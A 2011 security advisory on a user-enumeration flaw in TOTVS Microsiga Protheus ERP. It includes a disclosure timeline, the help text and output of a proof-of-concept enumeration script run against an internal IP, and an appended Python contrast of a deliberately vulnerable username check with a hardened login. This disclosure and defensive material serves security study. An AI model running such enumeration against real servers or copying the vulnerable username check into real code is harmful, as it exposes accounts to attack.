[DCA-2011-0002] [Discussion] - DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]
- TOTVS ERP Microsiga Protheus

[Vendor Product Description - translated from Portuguese]
- Management Software - TOTVS
  TOTVS is a software, innovation, relationship and management-support company. It is the undisputed leader in Brazil, with a 49.1% market share, and also in Latin America, with 31.2%*; it is the largest application-software company headquartered in emerging countries and the 7th largest in the sector worldwide. It has more than 25.2 thousand active customers, is backed by 9 thousand participants and is present in 23 countries.
  Value Proposition: to make the company more competitive, with faster decision-making, by offering solutions that organize, discipline, define and enforce processes, store data, generate information and support management.
- Source: http://totvs.com.br/web/guest/software

[Advisory Timeline]
- 02/Feb/2011 -> Initial contact with vendor, security contact requested.
- 03/Feb/2011 -> Security contact response.
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
- 04/Feb/2011 -> Vendor confirms notification received.
- 21/Feb/2011 -> Situation report requested.
- 01/Mar/2011 -> No vendor response.
- 02/Mar/2011 -> Advisory published.

[Bug Summary]
- User enumeration

[Impact]
- Low

[Affected Version]
- Microsiga Protheus 8 (20081215030344)
- Microsiga Protheus 10 (20100812040605)
- Other versions may also be affected but were not tested.

[Bug Description and Proof of Concept]
- The server validates the username before asking for a password, so we can keep submitting usernames until we receive a password prompt; the prompt alone confirms that the account exists.
- A Proof of Concept has been created:

--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help

options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -i IPADDRESS, --ipaddress=IPADDRESS
                        Server IP address
  -p PORT, --port=PORT  Port number (defaults to 1234)
  -t TARGET, --target=TARGET
                        Target Version: 8 -> Protheus 8 | 10 -> Protheus 10. Defaults to 10
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10 --ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---

----------------------------------------------------------------------------------------
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio dclabs com br

[Workarounds]
- An initial workaround was provided that blocks a user after 3 failed password attempts, but it does not work against this kind of user enumeration, since the username is rejected or accepted before any password is submitted.

[Credits]
DcLabs Security Research Group.

--
Best regards,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com
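The two login-flow shapes behind the bug described above, as an added Python illustration that is not part of the advisory or of the TOTVS product: the vulnerable shape answers the username before any password is sent, while the hardened shape gives every username the same prompt and one generic failure message, and, because the per-account lockout mentioned under Workarounds never sees a password during enumeration, it counts failures per source instead. The user store, password hashes and source addresses are constructed for the example.

```python
import hashlib
import hmac
from collections import defaultdict

# Constructed user store for the example (not a Protheus database): username -> PBKDF2 hash.
_SALT = b"constructed-salt"


def _hash_pw(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 10_000)


USERS = {"admin": _hash_pw("s3cret"), "jonas": _hash_pw("hunter2")}
_DUMMY_HASH = _hash_pw("not-a-real-password")  # compared for unknown users so the work is identical


def vulnerable_username_step(username: str) -> str:
    """Flawed flow from the advisory: the username is judged before any password is requested,
    so the reply alone tells the client whether the account exists."""
    return "PASSWORD_PROMPT" if username in USERS else "INVALID_USER"


def hardened_username_step(username: str) -> str:
    """Fixed flow: every username gets the same prompt; nothing is decided until a password arrives."""
    return "PASSWORD_PROMPT"


# Failure counter keyed by source, not by account: a per-account lockout (the advisory's workaround)
# never fires for an enumeration run that submits usernames only, whereas source throttling does.
_FAILS_PER_SOURCE = defaultdict(int)
MAX_FAILS_PER_SOURCE = 3


def hardened_login(source: str, username: str, password: str) -> str:
    if _FAILS_PER_SOURCE[source] >= MAX_FAILS_PER_SOURCE:
        return "THROTTLED"
    stored = USERS.get(username, _DUMMY_HASH)  # same code path for known and unknown users
    ok = hmac.compare_digest(stored, _hash_pw(password)) and username in USERS
    if not ok:
        _FAILS_PER_SOURCE[source] += 1
        return "LOGIN_FAILED"  # one generic message whether the user or the password was wrong
    _FAILS_PER_SOURCE[source] = 0
    return "OK"


def reset_throttle() -> None:
    _FAILS_PER_SOURCE.clear()
```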